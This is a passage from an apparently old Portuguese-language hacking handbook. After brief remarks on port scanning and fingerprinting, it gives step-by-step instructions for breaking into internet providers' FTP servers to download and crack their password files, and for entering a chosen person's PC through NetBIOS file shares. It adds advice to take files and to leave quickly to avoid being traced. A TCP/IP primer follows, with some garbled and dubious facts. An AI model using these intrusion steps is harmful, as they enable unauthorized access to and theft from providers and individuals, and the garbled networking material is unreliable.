FREQUENTES, COMO IREMOS VER A SERGUIR.



PARA QUE UM INVASOR POSSA EXPLORAR AS FALHAS DA SERGURANÇA NOS VÁRIOS
SISTEMAS DE SUA MÁQUINA, ELE PRECISA SABER ANTES O QUE ESTÁ DISPONÍVEL. EXSTEM
DOIS MÉTODOS BASTANTE UTILIZADOS PARA ESTE TIPO DE COLETA DE DADOS. A
VARREDURA DE PORTAS (PORT SCAN) E A IMPRESSÃO DIGITEL (FINGERPRINT) DO SISTEMA
OPERACIONAL.



PORT SCANS



USANDO PROGRAMAS ESPECIAIS, O INVADOR LANÇA SONDAS (PACOTES IP ESPECIAIS),
TENTANDO ESTABELECER CONEXÕES COM CADA UMA DAS 65535 PORTAS DO SEU
COMPUTADOR. SE EXISTE ALGUM SERVIÇO ASSOCIADO A ALGUMA PORTA, ELE IRÁ

                                       24
RESPONDER. DESTA MANEIRA, O INVASOR CONSEGUE SABER, EM POUCOS SEGUNDOS, O
QUE ESTÁ RODANDO EM SUA MÁQUINA.



IMPRESSÃO DIGITAL



ATRAVÉS DO ENVIO DE UMA SEQUENCIA ESPECIAL DE PACOTES IP A UM SITE ESPECÍFICO,
PODE-SE DETECTAR QUE SISTEMA OPERACIONAL ESTÁ RODANDO ANALIZANDO OS
PACOTES QUE ELE ENVIA DE VOLTA. COM POSSE DESSAS INFORMAÇÕES, ELE JÁ SABE QUE
FERRAMENTAS UTILIZAR PARA TENTAR INVADIR OU VANDALIZAR O SEU MICRO. E É NESTE
PONTO QUE VOCÊ DEVE PRESTAR MUITA ATENÇÃO. QA INFORMAÇÃO É A ALMA DO
NEGÓCIO. A INVASÃO DE SISTEMAS É BASICAMENTE UMA TAREFA DE PESQUISA E COLETA
DE DADOS. QUANTO MAIS INFORMADO E ATUALIZADO VOCÊ ESTIVER, MENOS CHANCES
TERÁ DE RECEBER UM ATAQUE NO FUTURO.



INVADINDO FTP´S

ATAQUE POR FTP (ML HACKING)



INGREDIENTES:



COMPUTADOR LIGADO À INTERNET

PROGRAMA FTP.EXE

UM CÉREBRO DE DOIS NEURÔNIOS NO MÍNIMO, SE NÃO O PROGRAMA NÃO RODA
DIREITO.

E UM PROVEDOR DE INTERNET PEQUENO A GOSTO.

MODO DE PREPARO:



LIGUE O COMPUTADOR.

CONECTE-SE À INTERNET.

CLIQUE EM INICIAR OU START, DEPENEENDO DO RUINDOWS.

CLIQUE EM EXECUTAR.


                                      25
DIGITE FTP E CLIQUE EM OK.

DEPOIS O PROGRAMA COMEÇARÁ.

AÍ VOCÊ VERÁ "FTP>"

DAÍ DIGITE OPEN www.provedor .COM.BR

NO LOGIN DIGITE: "ANONYMOUS"

NA SENHA DIGITE QUALQUER E-MAIL QUE NÃO SEJA O SEU E TEM QUE SER UM QUE NÃO
CHAME MUITO A ATENÇÃO.

VOCÊ ESTARÁ DENTRO DO PROVEDOR ESCOLHIDO. E AGORA? O QUE FAZER? EU IREI LEVÁ-
LO AO ARQUIVO QUE CONTÉM A SENHA, MAS DEPOIS VICÊ PODERÁ FAZER O QUE QUISER
EM OUTRO PROVEDOR.

DIGITE LS –AFL PARA LISTAR TODOS OS ARQUIVOS E DIRETÓRIOS DO PROVEDOR.

SE HOUVER O DIRETÓRIO ETC, DIGITE CD ETC, PARA MUDAR O DIRETÓRIO, SE NÃO TIVER
DIGITE CLOSE.

DIGITE LS –LA. SE HOUVER O ARQUIVO PASSWD DIGITE GET PASSWD, SE NÃO DIGITE
CLOSE.



PRONTO. TERMINADA A INVASÃO PEGUE O PROGRAMA JACK QUE TIRA AS SENHAS DO
ARQUIVO.



COLOCANDO NO PW FILE: PASSWD E NA OUTRA ENTRADA DE DADOS, QUE EU ESQUECI O
NOME COLOQUE A SUA WORDLIST.



SE VOCÊ NÃO TIVER NENHUM PROGRAMA DE FTP USE O DO MS-DOS. VÁ AO PROMPT E
DIGITE FTP. IRÁ APARECER O PROMPT FTP>, DIGITE OPEN, IRÁ ABRIR OUTRO PROMPT. DITE
ENTÃO O ENDEREÇO DO HOST PU O SEU IP.



AO CONECTAR ELE PEDIRÁ A SENHA E A PASSWORD, TENTE USAR OS PASSWORDS DO UNIX,
SE NÃO DER VOCÊ PODE ENTRAR INVISÍVEL. COMO EMTRAR INVISÍVEL?



NOLOGIN PRECIONE ENTER, NO PASSWORD PRECIONE NOVAMENTE. DEPOIS DIGITE
"QUOTE USER FTP", DÊ UM ENTER E DIGITE "QUOTE CWD~ROOT", PRECIONE ENTER

                                       26
NOVAMENTE E DIGITE "QUOTE PASS FTP". PRONTO, VOCÊ ESTÁ HACKEANDO...



NÃO TENTE HACKEAR USANDO O USER NORMAL DE FTP´S, QUE É LOGIN ANONYMOUS
PASSWORD E-MAIL, POIS SERÁ APLICADO O MODO DE PROTEÇÃO...



MEU DEUS, EU ENTREI, E AGORA O QUE EU FAÇO?



AO ENTRAR VOCÊ VAI ESTAR NO DIRETÓRIO DO LOGIN, TIPO HOMEROOT. DAÍ, PARA VER A
LISTA DE USERS VOCÊ VOLTA UM DIR E DIGITE DIRHOME, E CADA DIR É UM USUÁRIO. NÃO
TENTEM PEGAR AS SENHAS POIS ESTÃO CRIPTOGRAFADAS, POIS A MAIORIA DOS USERS
USA A MESMA SENHA LOGIN. SE VOCÊ NÃO SOUBER OS COMANDOS DE FTP, DIGITE ? E
TECLE ENTER. DAÍ, É SÓ HACKEAR. NUNCA FIQUE MAIS DO QUE 5 MINUTOS EM UM
PROVEDOR, SE NÃO ELE CAÇARÁ O SEU IP, DAÍ É CADEIA!!!!!!.



FTP DO DOS

COMANDOS

FUNÇÕES



APPEND

ACRESCENTAR UM ARQUIVO



ASCII

DEFINIR UM TIPO DE TRANFERÊNCIA ASCII



BELL

EMITIR UM AVISO SONORO AO TÉRMINO DO COMANDO



BINARY

DEFINIR TIPO DE TRANSFERÊNCIA BINÁRIA

                                        27
BYE

TERMINAR SEÇÃO DE FTP E SAIR



CD

ALTERAR A PASTA DE TRABALHO REMOTA



CLOSE

TERMINAR SESSÃO DE FTP



DELETE

EXCLUIR PASTAS DE TRABALHO REMOTA



DEBUG

LIGAR/DESLIGAR MODO DE DEPURAÇÃO



DIR

LISTAR CONTEÚDO DA PASTA REMOTA



DISCONNECT

TERMINAR SESSÃO DE FTP



GET

RECEBER ARQUIVO



GLOB



                                     28
LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE ARQUIVOS LOCAIS



HASH

LIGAR/DESLIGAR IMPRESSÃO "#" PARA CADA BUFFER TRANSFERIDO



HELP

AJUDA DO FTP



LCD

ALTERAR A PASTA DE TRABALHO LOCAL



LITERAL

ENVIAR UM COMANDO DE FTP ARBITÁRIO



LS

LISTAR O CONTEÚDO DA PASTA REMOTA



MDELETE

EXCLUI VÁRIOS ARQUIVOS



MDIR

LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS



M GET

OBTER VÁRIOS ARQUIVOS




                                     29
MKDIR

CRIA UMA PASTA NA MÁQUINA NA MÁQUINA REMOTA



MLS

LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS



MPUT

ENVIAR VÁRIOS ARQUIVOS



OPEN

CONECTAR AO FTP REMOTO



PROMPT

FORÇAR PROMPT INTERATIVO EM MÚLTIPLOS COMANDOS



PUT

ENVIAR UM ARQUIVO



PWD

IMPRIMIR A PASTA DE TRABALHO NA MÁQUINA REMOTA



QUIT

TERMINAR A SESSÃO DE FTP E SAIR



QUOT

ENVIAR UM COMANDO ARBITRÁRIO



                                    30
RECV

RECEBER ARQUIVO



REMOTEHELP

OBTER AJUDA A PARTIR DO SERVIDOR REMOTO



RENAME

RENOMEAR ARQUIVO



RMDIR

REMOVER PASTA DA MÁQUINA REMOTA



SEND

ENVIAR ARQUIVO



STATUS

MOSTRAR STATUS ATUAL



TRACE

LIGAR/DESLIGAR RASTREAMENTO DE PACOTES



TYPE

DEFINIR O TIPO DE TRANSFERÊNCIA DE ARQUIVOS



USER



                                      31
ENVIAR INFORMAÇÕES DE NOVO USUÁRIO



VERBOSE



Invasão por IP

Passa-a-passo: 1º- Certifique-se de que você possui este programa nbstat:



2º- Vá ao Prompt do MS-DOS.



3º- Digite: nbtstat -a o IP do cara que você quer invadir



4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não
aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras
por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que
tem no PC compartilhamento de arquivos as pastas)



5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o
nome do negócio que estiver com <03> atrás do nome.



6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O
NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu
digitei)



7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.



8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"



9º- Pronto! Você invadiu por IP!




                                              32
10º- Conselho : Nunca apague nem modifique NADA somente fuce bastante nas coisas do
lammaH e se achar algo interessante pega para você. OBS: Tem algumas pessoas que
renomeiam o arquivo vnbt.386 no windowssystem para que se alguem tente te nukar ou
invadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da para
invadir.



PROTOCOLOS DE REDE

TCP/IP SE REFERE AO CONJUNTO DE PROTOCOLOS USADOS NA INTERNET. ELE INCLUI UMA
SÉRIE DE PADRÕES QUE ESPECIFICAM COMO OS COMPUTADORES VÃO SE COMUNICAR E
CRIA CONVENÇÕES PARA INTERCONECTAR REDES PARA O ROUTEAMENTO ATRAVÉS DESSAS
CONEXÕES.



OS PROTOCOLOS DA INTERNET (IP), SÃO UM RESULTADO DO PROJETO DA DARPA, SOBRE
CONECTIVIDADE ENTRE REDES NO FINAL DOS ANOS 70. ELE FOI UTILIZADO EM TODAS AS
REDES DE LONGA DOSTÂNCIA DO SISTEMA DE DEFESA DOS EUA EM 1983, MAS NÃO FOI
RAPIDAMENTE ACEITO ATÉ SER INCORPORADO AO BSD UNIX 4.2.



A POPULARIDADE DO TCP/IP É BASEADO EM:



ESTRUTURA CLIENTE SERVIDOR ROBUSTA: O TCP/IP É UMA ÓTIMA PLATAFORMA CLIENTE
SERVIDOR, ESPECIALMENTE EM AMBIENTES WAN.



COMPARTILHAMENTO DE INFORMAÇÕES: MILHARES DE INFORMAÇÕES MILITARES,
EDUCACIONAIS, CIENTÍFICAS, E COMERCIAIS COMPARTILHAM DADOS, CORREIO
ELETRÔNICO E OUTROS SERVIÇOS DA INTERNET USANDO O TCP/IP. AMPLA
DISPONIBILIDADE. IMPLEMENTAÇÕES DO TCP/IP ESTÃO DISPONÍVEIS EM PRATICAMENTE
TODOS OS SISTEMAS OPERACIONAIS POPULARES. SEU CÓDIGO É AMPLAMENTE DISPONÍVEL
EM VÁRIAS IMPLEMENTAÇÕES. FABRICANTES DE BRIDGES, ROUTERS E ANALIZADORES DE
REDES OFERECEM SUPORTE PARA O TCP/IP EM SEUS PRODUTOS.



CONCEITOS



EXISTEM ALGUNS CONCEITOS QUE SÃO IMPRECINDÍVEIS EM RELAÇÃO AO TCP/IP E DE


                                            33
REDES QUE O UTILIZAM.



NÚMERO



EXISTEM ALGUMAS ANALOGIAS ENTRE COMPUTADORES E TELEFONES E O NÚMERO DE IP É
UMA DELAS. VOCÊ PODE IMAGINAR O NÚMERO DE IP COMO UM NÚMERO DE TELEFONE
COM TODOS OS CÓDIGOS DE DISCAGEM INTERNACIONAL. ISTO SE SIGNIFICA QUE
QUALQUER MÁQUINA PODE SE CONECTAR A OUTRO USANDO O NÚMERO DE IP, BASTADO
QUE EXISTA APENAS UM CAMINHO ENTRE AS DUAS. ALÉM DISSO, TODA MÁQUINA NA
REDE TEM DE TER UM NÚMERO DE IP.



ISTO TAMBÉM SIGNIFICA QUE DUAS MÁQUINAS NA MESMA REDE NÃO PODEM TER O
MESMO NÉMERO DE IP. ESTA RESTRIÇÃO SÓ OCORRE PARA MÁQUINAS NA MESMA REDE,
POIS MÁQUINAS NUMA REDE NÃO CONECTADA USUALMENTE TEM NÚMERO DE IP IGUAIS,
POR ALGUMAS CAUSAS TÉCNICAS. NO CASO DA ANALOGIA COM TELEFONES, IMAGINE
DUAS PESSOAS MORANDO EM PAÍSES DIFERENTES QUE POSSUAM O MESMO NÚMERO DE
TELEFONES (APENAS OS NÚMEROS LOCAIS). NESSE CASO NÃO HÁ CONFLITO.



O NÚMERO DE IP TEM 4 BYTES DE TAMANHO E TEM UM FORMATO ESPECÍFICO
XXX.XXX.XXX.XXX (EXEMPLO: 200.212.235.122). ISSO SIGNIFICA QUE CADA AGRUPAMENTO
PODE IR DE 0 À 255 (POIS ESSA É A CAPACIDADE DE 1 BYTE)



MÁSCARA



EXISTEM TRÊS CLASSES DE ENDEREÇOS IP: CLASSES A, B, C. A DIFERENÇA ENTRE AS CLASSES
É A FORMA DE COMO O ENDEREÇO DE IP É INTERPRETADO. O NÚMERO DE IP É DIVIDO EM
DUAS PARTES: O ENDEREÇO DA REDE EO ENDEREÇO DA SUBREDE. CONSIDERE O NÚMERO
DE IP DA SEGUINTE FORMA: W.X.Y.Z.



CLASSE

N º DE IP

INDICADOR DA REDE



                                        34
INDICADOR DA SUB REDE

NºDE REDES DISPONÍVEIS

NºDE SUB REDES DISPONÍVEIS



A

1.126

w

x.y.z

126

16,777,214



B

128.191

w.x

y.z

16,384

65,534



C

192.223

w.x.y

z

2,097,151

254



OBS: O ENDEREÇO 192.168 É RESERVADO PARA USO EM REDES INTERNAS, O ENEREÇO 127
É UTILIZADO PARA TESTES DE LOOP BACK E OS ACIMA DE 224 SÃO RESERVADOS PARA


                                     35
PROTOCOLOS ESPECIAIS.



UMA SUB REDE É UMA REDE LIGADA DIRETAMENTE ATRAVÉS DE UMA REDE PERTENCENTE
À INTERNET. A REDE PERTENCENTE RECEBE UM NÚMERO DE IP E DITRIBUI O NÚMERO DE IP
DENTRO DE SUA SUB REDE. AS CLASSES APENAS DEFINEM QUEANTAS SUB REDES UM
NÚMERO DE IP TEM. DE ACORDO COM A TABELA, EXISTEM 126 NÚMEROS DE IP DQA
CLASSE A E CADA UM DELES PODE TER CERCA DE 16.777.214 SUB REDES. VOCÊ LOGO PODE
IMAGINAR QUE NÃO EXISTAM ENDEREÇOS DE CLASSE A E B NA INTERNET, E QUE OS DA
CLASSE C ESTÃO ACABANDO, A IETF ESTÁ ESTUDANDO A EXPANSÃO DESSES NÚMEROS.



AS MÁSCARAS DE SUB REDE IDENTIFICAM A CLASSE DO NÚMERO DE IP. A PRIMEIRA VISTA
PARECE DESNECESSÁRIO, POIS BASTA OLHAR O PRIMEIRO NÚMERO DO IP PARA
DETERMINAR A CLASSE. MAS ACONTECE QUE UM NÚMERO DE IP DA CLASSE A PODE
FUNCIONAR COMO UM DA CLASSE B OU CLASSE C, DEPENDENDO DA ESTRUTURA INTERNA
DA SUA SUB REDE. UM EXEMPLO: IMAGINE UMA EMPRESA COM 200 FILIAIS NO BRASIL
CONECTADAS POR UMA REDE PRÓPRIA. A MATRIZ TEM UM NÚMERO DE IP DE CLASSE A,
DIGAMOS 100 E DISTRIBUI AS SUAS SUB REDES DA SEGUINTE FORMA:



100.1.0.0

Matriz



100.2.0.0

Filial 1



100.3.0.0

Filial 2



100.201.0.0

Filial 200




                                      36
PARA AS FILIAIS, O NºDE IP (EX: 100.201.0.0) É DE CLASSE B, POIS SÓ TEM 16.384 SUBREDES
DISPONÍVEIS, EMBORA COMECE COM 100. DENTRO DAS FILIAIS AINDA É POSSÍVEL SE
DISTRIBUIR SUB REDES, AS QUAIS TERIAM NÚMEROS DE IP CLASSE C.



PARA QUE O ROTEAMENTO FUNCIONE CORRETAMENTE, OS COMPUTADORES PRECISAM
SABER QUAL A CLASSE DO NÚMERO DE IP, E ELAS SÃO AS SEGUINTES:




Classe

Máscara de Sub-rede



A

255.0.0.0



B

255.255.0.0



C

255.255.255.0



GATEWAY

GATEWAY PADRÃO É A MÁQUINA PÁRA QUEM PEDIMOS AJUDA QUANDO NÃO
CONSEGUIMOS ACHAR UMA OUTRA MÁQUINA NA REDE. FUNCIONA ASSIM: QUANDO UMA
MÁQUINA DA REDE PRECISA SE COMUNICAR COM OUTRA, ELA EMITE UM PEDIDO DE
CONEXÃO (ESSE PEDIDO É FEITO ATRAVÉS DO BROADCASTING, OU SEJA, A MÁQUINA QUE
ENVIA O PEDIDO A TODA A REDE, E APENAS A MÁQUINA DESTINO RESONDE), E AGUARDA
UMA RESPOSTA. SE ELA NÃO VIER, ELA ENTRA EM CONTATO COM O GATEWAY PADRÃO E

                                          37
SOLICITA QUE O MESMO CONECTE COM A MÁQUINA DESTINO. SE O GATEWAY CONSEGUIR
CONECTAR À MÁQUINA DESTINO, ELE FICA COMO INTERMEDIADOR DESSA CONEXÃO, CASO
CONTRÁRIO, ELE VISA A MÁQUINA SOLICITANTE QUE NÃO FOI POSSÍVEL ENCONTRAR A
MÁQUINA DESTINO. ESSA ESTRUTURA DE PROCURA VISA DIMINUIR O TRÁFEGO
DESNECESSÁRIO NA REDE. IMAGINE SÓ SE TODA A CONEXÃO REALIZADA NA INTERNET (E
TODAS AS REDES CONECTADAS A INTERNET) FOSSE ENVIADA A TODOS OS COMPUTADORES
LIGADAS A ELA. SERIA UM TRÁFEGO MUITO GRANDE. AO INVÉS DISSO, O BROADCAST É
DIVIDIDO EM NÍVEIS, PRIMEIRO NA LAN (LOCAL AREA NETWORK OU REDE LOCAL) DEPOIS
NA WAN DE SUA CIDADE OU ESTADO, DEPOIS NA WAN NACIONAL ATÉ CHEGAR NA WAN
INTERNACIONAL. REDUZ-SE DESSE MODO TODO O TRÁFEGO INTERNO ÀS WANS E LANS
ALIVIANDO AS LINHAS DE CONEXÃO.



DNS

ESSAS 3 LETRAS NÃO SEIGNIFICAM MUITO PARA A MAIORIA DAS PESSOAS, MAS ELAS
DIGNIFICAM DOMAIN NAME SYSTEM. ESSAS 3 PALAVRAS TAMBÉM NÃO SIGNIFICAM COISA
ALGUMA PARA A MIORIA DAS PESSOAS, POR ISSO, VAMOS À ANALOGIA COM O TELEFONE.
QUANDO VOCÊ DESEJA TELEFONAR PARA A LOJA DA ESQUINA, VOCÊ CONSULTA O
CATÁLOGO, DESCOBRE O TELEFONE DE LÁE LIGA. VOCÊ NÃO CONSEGUE TELEFONAR PARA
ALGUM LUGAR SE NÃO SOUBER O NÚMERO. NA REDE TCP/IP ACONTECE A MESMA COISA.
OS USUÁRIOS NÃO DECORAM O NÚMERO DE IP DAS MÁQUINAS, E SIM OS NOMES. MAS
PARA SE ALCANÇAR UMA MÁQUINA NA REDE PRECISAMOS DO SEU NÚMERO DE IP. PARA
RESOLVER ISSO FOI CRIADO O DNS, UM SERVIÇO DISPONÍVEL NA REDE QUE, DADO UM
NOME DE MÁQUINA, ELE RETORNA O NÚMERO DE IP DA MESMA. EXISTE UMA
PARTICULARIDADE AQUI. NO CASO DA REDE LOCAL ESTAR CONECTADA A ALGUMA OUTRA,
É RECOMENDÁVEL QUE O SERVIDOR DNS, SEJA EXECUTADO NA MÁQUINA DE LIGAÇÃO
ENTRE AS DUAS REDES (O GATEWAY), PARA CASO DE O NOME REQUISITADO NÃO EXISTIR
NA REDE LOCAL , O DNS POSSA PEDIR AO SERVIDOR DNS DA OUTRA REDE PARA PESQUISAR
O TAL NOME.



O WINDOWS NT OFERECE UM SERVIÇO SEMELHANTE, O WINS (WINDOWS INTERNET NEME
SYSTEM OU SISTEMA DE NOMES DA INTERNET DO WINDOWS). A PRINCIPAL DIFERENÇA
ENTRE OS DOIS É QUE O DNS USA UMA TABELA ESTÁTICA, E O WINS USA UMA TABELA
DINÂMICA. NO CASO DO SERVIDOR DNS RODAR NUMA MÁQUINA DO WINDOWS NT É
RECOMENDÁVEL QUE ELE SEJA SUSTIUÍDO PELO WINS.



DHCP

MAIS UM CASO DE LETRAS QUE NÃO SIGNIFICAM NADA PARA A MIORIA DOS USUÁRIOS.
MAS INFELIZMENTE NÃO EXISTE UMA BOA ANALOGIA PARA O DHCP, PORTANTO VAMOS

                                      38
DIRETO AO ASSUNTO. DHCP SIGNICA "DINAMIC HOST CONFIGURATION PROTOCOL", OU
SEJA: PROTOCOLO DE CONFIGURAÇÃO DE HOST DINÂMICO. NIAM REDE TCP/IP, TODO
COMPUTADOR, TODO COMPUTADOR TEM DE TER UM IP DISTINTO. ISSO SIGNIFICA QUE
ANTES DE COLOCAR UMA NOVA MÁQUINA NA REDE, O ADMINISTRADOR TERIA DE
IDENTIFICAR QUAIS NÚMEROS ESTÃO SENDO UTILIZADOS PARA ESCOLHER UM NÚMERO
ADEQUADO PARA A NOVA MÁQUINA. EM PEQUENAS REDES ISSO É POSSÍVEL SER FEITO,
MAS EM GRANDES REDES ISSO SE TORNA UMA TAREFA TEDIOSA E SUJEITA A FALHAS. PARA
EVITAR ISSO FOI CRIADO O DHCP. QUANDO UMA MÁQUINA ENTRA NA REDE, ELA PROCURA
O SERVIDOR DHCP (CUJO NÚMERO DE IP FOI PREVIAMENTE FORNECIDO) E SOLICITA UM
NÚMERO DE IP PARA SI PRÓPRIA. O SERVIDOR VERIFICA QUAL O NÚMERO DISPONÍVEL,
INFORMA AO SOLICITANTE ESSE NÚMERO E O TORNA INDISPONÍVEL PARA FUTURAS
SOLICITAÇÕES. DESSA MANEIRA A ADMINISTRAÇÃO DOS NÚMEROS DE IP SÃO FEITAS
AUTOMATICAMENTE E NÃO EXISTEM PROBLEMAS DE CONFLITO. QUANDO A MÁQUINA
SOLICITANTE SAI DA REDE, O SERVIDOR DHCP TORNA ESSE NÚMERO DISPONÍVEL
NOVAMENTE.



PORTAS

UMA PORTA PODE SER VISTA COMO UM CANAL DE COMUNICAÇÕES PARA UMA MÁQUINA.
PACOTES DE INFORMAÇÕES CHEGANDO A UMA MÁQUINA NÃO SÃO APENAS
ENDEREÇADAS À MÁQUINA, E SIM A MÁQUINA NUMA DTERMINADA PORTA. VOCÊ PODE
IMAGINAR UMA PORTA COMO SENDO UM CANAL DE RÁDIO, COM A DIFIRENÇA
FUNDAMENTAL DE QUE UM COMPUTADOR PODE "OUVIR" TODOS OS 65000 CANAIS
POSSÍVEIS AO MESMO TEMPO.



ENTRETANTO, UM COMPUTADOR GERALMENTE NÃO ESTÁ OUVINDO EM TODAS AS
PORTAS, ELE ESCUTA A ALGUMAS PORTAS ESPECÍFICAS. E ELE NÃO VAI RESPONDER A UM
PEDIDO A UMA PORTA QUE ELE NÃO ESTEJA ESCUTANDO.



EXISTEM UMA SÉRIE DE PORTAS PRÉ DEFINIDAS PARA CERTOS SERVIÇOS QUE SÃO ACEITOS
UNIVERSALMENTE. AS PRINCIPAIS SÃO:



SERVIÇO

PORTA

DESCRIÇÃO




                                      39
FTP

21

PROTOCOLO DE TRANSFERÊNCIA DE ARQUIVOS



TELNET

23

PARA SE CONECTAR REMOTAMENTE A UM SERVIDOR



SMTP

25

PARA ENVIAR UM EMAIL



GOPHER

70

BROWSER BASEADO EM MODO TEXTO



HTTP

80

PROTOCOLO WWW – NETSCAPE, MOSAIC



POP3

110

PARA RECEBER EMAIL



NNTP

119



                                   40
NEWS GROUPS



IRC

6667

INTERNET RELAY CHAT – BATE PAPO ONLINE



COMPUSERV

4144

COMPUSERV WINCIM



AOL

5190

AMERICA ONLINE



MSN

569

MICROSOFT NETWORK



OUTROS

OUTROS

OUTROS



ROTEADOR: É UM COMPUTADOR QUE É UTILIZADO PARA CONECTAR DUAS OU MAIS REDES
DISTINTAS. ELE TEM ESSE NOME PORQUE TEM DE ROTEAR (OU DIRECIONAR) OS PACOTES
DE UMA REDE PARA OUTRA, ATUANDO COMO UM GUARDA DE TRÂNSITO PARA OS
PACOTES ENTRE AS REDES.



GATEWAY: O GATEWAY TAMBÉM É UM COMPUTADOR QUE SERVE PARA CONECTAR DUAS

                                         41
OU MAIS REDES DISTINTAS. A PRINCIPAL DIFERENÇA PARA O ROTEADOR É QUE O GATEWAY
NÃO TEM UM HARDWARE ESPECIAL PARA O ROTEAMENTO. USUALMENTE OS GATEWAYS
CONECTAM LANS E OS ROTEADORES, WANS. EM VÁRIOS CASOS SE UTILIZA UM ROTEADOR
EM CONJUNTO COM O GATEWAY.



VISÃO: UMA REDE UTILIZANDO O TCP/IP TEM UMA ESTRUTURA BÁSICA COMPOSTA POR
UM OU MAIS SERVIDOR RODANDO UM SERVIDOR DNS (OU WINS), DHCP, SMTP, POP3, E OS
SERVIDORES DOS SERVIÇOS DESEJADOS (HTTP, TELNET, GOPHER, ETC) E AS MÁQUINA
CLIENTES SOLICITANDO ESSES SERVIÇOS. PARA SE INTERLIGAR ESSA REDE A OUTRA REDE
TCP/IP, SE FAZ NECESSÁRIO O USO DE UM ROTEADOR OU GATEWAY E DA CORRETA
CONFIGURAÇÃO DA REDE.



EXISTEM DUAS MANEIRAS DE SE LIGAR A LAN À INTERNET:



ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA CADA MÁQUINA NA REDE, O QUE PODE SER
IMPOSSÍVEL PARA REDES COM MUITAS MÁQUINAS.



ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA O GATEWAY E UTILIZANDO-SE O NÚMERO DE
IP 192.168.X.X INTERNAMENTE.



COMO O SEGUNDO CASO É O MAIS FACTÍVEL, VAMOS OBERVÁ-LO MELHOR. NELE, SE
UTILIZA INTERNAMENTE A LAN O IP 192.168.X.X , QUE , QUANDO DA DETERMINAÇÃO DOS
NÚMEROS DE IP FOI RESERVADO PARA O USO DE REDES INTERNAS, OU SEJA, NENHUMA
MÁQUINA LIGADA DIRETAMENTE A INTERNET TEM UM IP 192.168.X.X. ISSO É NECESSÁRIO
POIS COMO JÁ VIMOS NENHUMA MÁQUINA PODE TER UM NÚMERO DE IP QUE JÁ ESTEJA
SENDO UTILIZADO POR UMA OUTRA MÁQUINA.



O GATEWAY TEM DUAS INTERFACES DE REDE, UMA PARA SE CONECTAR À INTERNET E
OUTRA PARA SE CONECTAR À LAN. A INTERFAE DA INTERNET É ATRIBUIDO O NÚMERO DE
IP VÁLIDO NA INTERNET E NA LAN O NÚMERO DE IP DO TIPO 192.168.X.X (USUALMENTE
192.168.0.1). NAS MÁQUINAS DA LAN O NÚMERO DO IP É DO TIPO 192.168.X.X (ONDE O
PRIMEIRO X É O MESMO DO GATEWAY) E O GATEWAY DEFALT É O IP DO GATEWAY
VOLTADO PARA A LAN (192.168.X.X). DESSA FORMA PODEMOS TER ATÉ 16.384 MÁQUINAS
NA INTERNET POR NÚMERO DE IP VÁLIDO. ESSA ESTRUTURA TAMBÉM FACILITA A ADOÇÃO
DE MEDIDAS DE SEGURANÇA CONTRA INTRUSOS DA INTERNET, POIS COMO TODO O
TRÁFEGO NA INTERNET PASSA PELO GATEWAY, BASTA PROTEGÊ-LO PARA PROTEGER TODA

                                       42
A LAN.



PROTOCOLOS

TCP E IP: O TCP E O IP SÃO APENAS DOIS MEMBROS DA FAMÍLIA TCP/IP. IP É UM
PROTOCOLO QUE PROVIDENCIA A ENTREGA DE PACOTES PARA TODOS OS OUTROS
PROTOCOLOS DA FAMÍLIA TCP/IP. O IP FORNECE UM SISTEMA DE ENTREGA DE DADOS SEM
CONEXÃO. ISTO É, OS PACOTES IP NÃO SÃO GARANTIDOS DE CHEGAREM AO SEU DESTINO,
NEM DE SEREM RECEBIDOS DA FORMA QUE FORAM ENVIADOS. O CHECK SUN DO IP
CONFIRMA APENAS A INTEGRIDADE DO CABEÇALHO DO PACOTE. DESTA MANEIRA, A
RESPONSABILIDADE PELOS DADOS CONTIDOS NO PACOTE DO IP (E SUA SEQUÊNCIA) É
TAREFA DE PROTOCOLOS DE MAIS ALTO NÍVEL.



TALVEZ O PROTOCOLO DE MAIS ALTO NÍVEL DO IP SEJA O TCP. O TCP OFERECE UM
CONFIÁVEL PROTOCOLO BASEADO EM CONEXÃO CAPSULADO NO IP. O TCP GARANTE A
ENTREGA DOS PACOTES, ASSEGURA O SEQUENCIAMENTO DOS PACOTES E PROVIDENCIA
UM CHECKSUN QUE VALIDA TANTO O CABEÇALHO QUANTO OS DADOS DO PACOTE. NO
CASO DA REDE PERDER OU CORROMPER UM PACOTE TCP/IP DURANTE A TRANSMISSÃO, É
TAREFA DO TCP RETRANSMITIR O PACOTE FALTOSO OU INCORRETO. ESSA CONFIABILIDADE
TORNA O TCP/IP O PROTOCOLO ESCOLHIDO PARA TRANSMISSÕES BASEADAS EM SESSÃO,
APLICATIVOS CLIENTE-SERVIDOR E SERVIÇOS CRÍTICOS COMO CORREIO ELETRÔNICO.



PORÉM, ESSA CONFIABILIDADE TEM UM PREÇO. OS CABEÇALHOS DOS PACOTES TCP
REQUEREM USO DE BITS ADICIONAIS PARA ASSEGURAR O CORRETO SEQUENCIAMENTO DA
INFORMAÇÃO, BEM COMO UM CHECK SUN OBRIGATÓRIO PARA GARANTIR A INTEGRIDADE
DO CABEÇALHO E DOS DADOS. PARA GARANTIR A ENTREGA DOS PACOTES, O PROTOCOLO
TAMBÉM REQUER QUE O DESTINATÁRIO INFORME O RECEBIMENTO DO PACOTE.



TAL INFORMÇÃO DE RECEBIMETO (OU ACKS) GERAM TRÁFEGO ADICIONAL NA REDE,
DIMINUINDO A TAXA DE TRANFERÊNCIA DE DADOS EM FAVOR DA CONFIABILIDADE. PARA
REDUZIR O IMPACTO NA PERFORMANCE, A MIORIA DOS SERVIDORES ENVIAM UM ACK
PARA TODOS (AO INVÉS DE TODO O PACOTE) OU QUANDO UM ACK EXPIRA.




UDP: SE A CONFIABILIDADE NÃO É ESSENCIAL, O UDP (USER DATAGRAM PROTOCOL), UM

                                      43
